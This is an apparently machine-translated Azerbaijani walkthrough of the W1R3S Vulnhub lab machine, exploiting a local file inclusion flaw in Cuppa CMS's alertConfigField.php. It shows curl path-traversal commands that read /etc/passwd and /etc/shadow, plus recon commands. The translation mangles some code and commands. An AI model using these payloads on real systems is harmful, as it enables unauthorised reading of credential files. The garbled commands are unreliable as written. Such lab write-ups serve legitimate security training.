WEb tətbiqetmələrinin nüfuz sınaqları zamanı hədəf tətbiqindəki zəiflik səbəbi ilə gözlənilməz fayllar veb tətbiqetmə tərəfindən icra edilə bilər. Bu yazıda, edilməsi Fayl açığı ilə bağlı Cuppa CMS W1R3S: 1.0.1 virtual maşın istifadə olunacaq.
Məqalədə istifadə olunan W1R3S: 1.0.1 virtual maşını Vulnhub saytından yükləyə bilərsiniz .
https://www.vulnhub.com/entry/w1r3s-101,220/
Apache xidməti virtual maşının TCP \ 80 portunda işləyir .
http://192.168.106.129
Github- dakı dirsearch vasitəsi tətbiqdəki qovluqları tapmaq üçün istifadə edilə bilər.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
./dirsearch.py -u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3
” Rekursiv ” seçim dərin araşdırma üçün dirsearch alətində də istifadə edilə bilər.
./dirsearch.py -u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3 -r -R 4
Kəşf edilmiş ” administrator ” qovluğuna getdiyiniz zaman avtomatik olaraq ” quraşdırma ” qovluğuna yönəldilir.
whatweb http://192.168.106.129/administrator
Quraşdırma səhifəsində və ya “İrəli” düyməsinə vurulduqda Cuppa CMS-dən istifadə edildiyi görülür.
Cuppa CMS ilə əlaqəli zəifliklər araşdırıldıqda, LFI / RFI zəifliyi aşkar edildi.
searchsploit cuppa
searchsploit -m 25971
Zəiflik detalları araşdırıldıqda, alertConfigField.php sənədindəki nəzarətin olmamasının zəifliyə səbəb olduğu görülür .
Cuppa CMS-in mənbə kodu zəifliyi görmək üçün internetdən və ya virtual maşından əldə edilə bilər. Zəifliyin Cuppa CMS-in ən son versiyasında davam etdiyi görülür.
- https://github.com/CuppaCMS/CuppaCMS
- http://cuppacms.com/files/cuppa_cms.zip
- http://192.168.106.129/cuppa_cms.zip
” AlertConfigField.php ” sənədinin 77-ci sətrində məlumatların müştəri tərəfindən birbaşa ” daxil ” funksiyasına göndərilə biləcəyi və server tərəfində heç bir nəzarət edilmədiyi görülür.
<div id = ”content_alert_config” class =
”content_alert_config ”> <? php daxildir “../components/table_manager/fields/config/eace.@$cuppa- > POST (” urlConfig ”); ?>
</div>
Zəiflikdən istifadə etmək üçün bir veb brauzerdən istifadə edildiyi zaman, gözlənildiyi kimi, ” qıvrım ” vasitəsi URL kodlaşdırmaqla istifadə edilə bilər , çünki cavab gözlənildiyi kimi alınmır .
curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /
passwd http://192.168.106.129/administrator/alerts /alertConfigField.php
| grep “class = \” content_alert_config \ ”” -A50
Oxşar əməliyyat / etc / shadow üçün edildikdə , faylın oxuna biləcəyi görülür.
curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /
shadow http://192.168.106.129/administrator/alerts /alertConfigField.php
| grep “class = \” content_alert_config \ ”” -A50 | grep -home “: \ *:”
Qeyd: Bu virtual maşın üzərində Cuppa CMS işləyən Apache tətbiqetmə istifadəçisinin ( www-data ) standart bir hesab olduğu görünür. Bununla birlikdə, bütün istifadəçilərin ( Hər kəsin / Başqalarının ) / etc / shadow faylının məzmununu oxumağa və yazmağa icazə verildiyi üçün , əməliyyat sistemindəki istifadəçilərin parol xülasələri ” www-data ” istifadəçisinin icazəsi ilə oxuna bilər. .
netstat -nlpt
ps -ef | grep 1488
qrupları www-data
ls -la / etc / shadow
Virtual maşında Cuppa CMS-nin konfiqurasiya faylı araşdırıldıqda, standart sənədlərin dəyişdirildiyi görülür.
cat Configuration.php | grep -i ‘$password’ -A3 -B3